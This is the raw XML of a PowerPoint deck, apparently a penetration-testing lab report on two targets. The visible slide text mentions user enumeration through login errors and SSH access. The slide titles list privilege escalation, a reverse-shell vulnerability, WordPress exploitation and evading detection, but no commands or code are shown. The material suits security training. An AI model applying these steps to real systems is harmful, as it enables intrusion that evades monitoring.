            <a:ext cx="17257649" cy="3830726"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="271463" dist="95250" dir="7080000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="47000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="Google Shape;200;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202900" y="8997575"/>
            <a:ext cx="7943400" cy="3938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700" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>What did the exploit achieve?</a:t>
            </a:r>
            <a:endParaRPr sz="3700" b="1">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en-US" sz="3700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Identified two users:</a:t>
            </a:r>
            <a:endParaRPr sz="3700">
              <a:solidFill>
                <a:schemeClr val="dk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en-US" sz="3700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3700" b="1">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Michael</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>” and “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3700" b="1">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Steven</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr sz="3700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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US" sz="3700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Confirmed by: Login Error Messages</a:t>
            </a:r>
            <a:endParaRPr sz="3700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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en-US" sz="3700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Use SSH to gain a user shell</a:t>
            </a:r>
            <a:endParaRPr sz="37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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19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9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19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0"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20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98"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19"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2364</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>375</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Roboto</vt:lpstr>
      <vt:lpstr>Lato Light</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Roboto Black</vt:lpstr>
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Table of Contents</vt:lpstr>
      <vt:lpstr>Network Topology &amp; Critical Vulnerabilities</vt:lpstr>
      <vt:lpstr>Network Topology</vt:lpstr>
      <vt:lpstr>Scanning the network - Nmap</vt:lpstr>
      <vt:lpstr>Exploits Used</vt:lpstr>
      <vt:lpstr>TARGET “1”</vt:lpstr>
      <vt:lpstr>Critical Vulnerabilities: Target 1</vt:lpstr>
      <vt:lpstr>Exploitation of User Enumeration </vt:lpstr>
      <vt:lpstr>Exploitation of Weak User Password </vt:lpstr>
      <vt:lpstr>Exploitation of MySQL Database </vt:lpstr>
      <vt:lpstr>Exploitation: Privilege Escalation</vt:lpstr>
      <vt:lpstr>Exploitation: Unsalted User Password Hash  </vt:lpstr>
      <vt:lpstr>Exploitation: Privilege Escalation </vt:lpstr>
      <vt:lpstr>Avoiding Detection</vt:lpstr>
      <vt:lpstr>Stealth Exploitation of User Enumeration and Weak Password</vt:lpstr>
      <vt:lpstr>Stealth Exploitation of MySQL Database </vt:lpstr>
      <vt:lpstr>Stealth Exploitation of Privilege Escalation</vt:lpstr>
      <vt:lpstr>TARGET “2”</vt:lpstr>
      <vt:lpstr>Critical Vulnerabilities: Target 2</vt:lpstr>
      <vt:lpstr>Scanning: Nmap and nikto enumeration</vt:lpstr>
      <vt:lpstr>Exploitation: Brute-force URL directories and files </vt:lpstr>
      <vt:lpstr>Exploitation: Reverse shell/remote execution vulnerability</vt:lpstr>
      <vt:lpstr>Exploitation: Reverse shell/remote execution vulnerability </vt:lpstr>
      <vt:lpstr>Exploit: Unrestricted Access to WordPress directories </vt:lpstr>
      <vt:lpstr>Rooting Target 2: </vt:lpstr>
      <vt:lpstr>Setting up / Replicating the exploit on “Target 2“</vt:lpstr>
      <vt:lpstr>Becoming Root (In Theory) </vt:lpstr>
      <vt:lpstr>Avoiding Detection</vt:lpstr>
      <vt:lpstr>Monitoring overview Target 2 </vt:lpstr>
      <vt:lpstr>Stealthier Solution to bypass detection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Rami AlGhazzi</dc:creator>
  <cp:lastModifiedBy>Rami AlGhazzi</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-29T19:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>